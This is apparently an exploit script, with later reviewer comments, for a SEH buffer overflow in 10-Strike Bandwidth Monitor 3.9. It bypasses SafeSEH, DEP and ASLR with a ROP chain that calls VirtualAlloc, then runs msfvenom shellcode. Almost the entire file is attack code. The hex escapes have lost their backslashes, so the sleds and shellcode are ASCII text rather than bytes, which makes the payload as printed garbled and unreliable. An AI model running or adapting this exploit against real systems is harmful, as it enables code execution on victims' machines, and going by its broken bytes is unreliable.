# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Prevention (DEP) using Return Oriented Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => truncates the buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit

# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------

import struct
# Leading filler: 400 copies of the literal 'x41'. As written here each token
# is three ASCII characters (the escape backslashes appear to have been lost
# in transcription), so this string is 1200 characters long.
OS_retSled = 400 * 'x41'
# RET sled: 100 copies of the address token for 0x11060124, a `retn` in
# LIBEAY32.dll (PAGE_EXECUTE_READ). The sled absorbs the varying pivot
# landing offset noted in the header ("StackPivot lands at a different offset").
# Defender note: this only works because LIBEAY32.dll loads at a fixed base
# (no Rebase/ASLR in the module table above); a /DYNAMICBASE build breaks it.
retSled = 100 * 'x24x01x06x11'

# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc

# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....

def createRopChain():
# rop chain generated with mona.py - www.corelan.be
ropGadgets = [
0x1202ef02, # POP EBP # RETN [ssleay32.dll]
0x1202ef02, # skip 4 bytes [ssleay32.dll]
0x01215f16, # POP EBX # RETN [BandMonitor.exe]
0xffffffff, #
0x012175f5, # INC EBX # RETN [BandMonitor.exe]
0x01056ff7, # INC EBX # RETN [BandMonitor.exe]
0x011e94d4, # POP EDX # RETN [BandMonitor.exe]
0xffffefff, # Value to negate, destination value : 0x00001000
0x01218952, # NEG EDX # RETN [BandMonitor.exe]
0x011ead1b, # DEC EDX # RETN [BandMonitor.exe]
0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll]
0xffffffff, #
0x11016023, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1202fe55, # POP EDI # RETN [ssleay32.dll]
0x01225803, # RETN (ROP NOP) [BandMonitor.exe]
0x1105ed16, # POP ESI # RETN [LIBEAY32.dll]
0x110495ef, # JMP [EAX] [LIBEAY32.dll]
0x012126f5, # POP EAX # RETN [BandMonitor.exe]
0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
0x110762c4, # PUSHAD # RETN [LIBEAY32.dll]
0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll]
]
return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()  # packed gadget chain; its length feeds the OS_nSEH padding computed below
# NOP sled: 100 copies of the 'x90' token. Note that in this listing every
# hex escape appears with its backslash missing (presumably lost in
# transcription), so each token is three ASCII characters, not one byte.
nopSled = 100 * 'x90'
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b 'x00x0dx0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
# Adjacent bytes literals are concatenated by the parser; the result is the
# same object the original built with repeated `+=`. As written, the 20 lines
# of 11 tokens give 660 characters, not the 220 bytes msfvenom reports.
shellcode = (
    b"xbfxd2xa1xc4xd3xdaxdbxd9x74x24xf4"
    b"x5ex31xc9xb1x31x83xc6x04x31x7ex0f"
    b"x03x7exddx43x31x2fx09x01xbaxd0xc9"
    b"x66x32x35xf8xa6x20x3dxaax16x22x13"
    b"x46xdcx66x80xddx90xaexa7x56x1ex89"
    b"x86x67x33xe9x89xebx4ex3ex6axd2x80"
    b"x33x6bx13xfcxbex39xccx8ax6dxaex79"
    b"xc6xadx45x31xc6xb5xbax81xe9x94x6c"
    b"x9axb3x36x8ex4fxc8x7ex88x8cxf5xc9"
    b"x23x66x81xcbxe5xb7x6ax67xc8x78x99"
    b"x79x0cxbex42x0cx64xbdxffx17xb3xbc"
    b"xdbx92x20x66xafx05x8dx97x7cxd3x46"
    b"x9bxc9x97x01xbfxccx74x3axbbx45x7b"
    b"xedx4ax1dx58x29x17xc5xc1x68xfdxa8"
    b"xfex6bx5ex14x5bxe7x72x41xd6xaax18"
    b"x94x64xd1x6ex96x76xdaxdexffx47x51"
    b"xb1x78x58xb0xf6x77x12x99x5ex10xfb"
    b"x4bxe3x7dxfcxa1x27x78x7fx40xd7x7f"
    b"x9fx21xd2xc4x27xd9xaex55xc2xddx1d"
    b"x55xc7xbdxc0xc5x8bx6fx67x6ex29x70"
)

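# Padding between the payload and the SEH record. The constants 4188, 600 and
# 200 are not explained on the page; presumably they are the distance to the
# SEH record minus the fixed-size sleds in front of the chain — confirm in a
# debugger before relying on them.
OS_nSEH = 'x43' * (4188 - 600 - 200 - len(ropChain + nopSled + shellcode))
nSEH = 'x44' * 4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
# The handler address lives in BandMonitor.exe, which the module table shows
# is not SafeSEH-linked; a /SAFESEH build would refuse to dispatch to it.
SEH = 'x70x28x21x01'  # 0x01212870 : {pivot 2064 / 0x810}
extra = 'x44' * 2000
# NOTE(review): this is Python 2 code — shellcode is a bytes literal while the
# other parts are str, so the concatenation raises TypeError on Python 3.
# The name also shadows the Python 2 builtin `buffer`.
buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File = 'poc.txt'
try:
    # The context manager closes the handle even when write() fails; the
    # original left it open on that path.
    with open(File, 'w') as f:
        f.write(buffer)
except (IOError, OSError):
    # Only file-system errors are expected here. The original bare `except:`
    # also swallowed KeyboardInterrupt and programming errors such as a
    # NameError, hiding the real cause behind "failed to create".
    print(File + ' failed to create')
else:
    # Parenthesised print is valid in both Python 2 and 3 for a single argument.
    print(File + " created successfully")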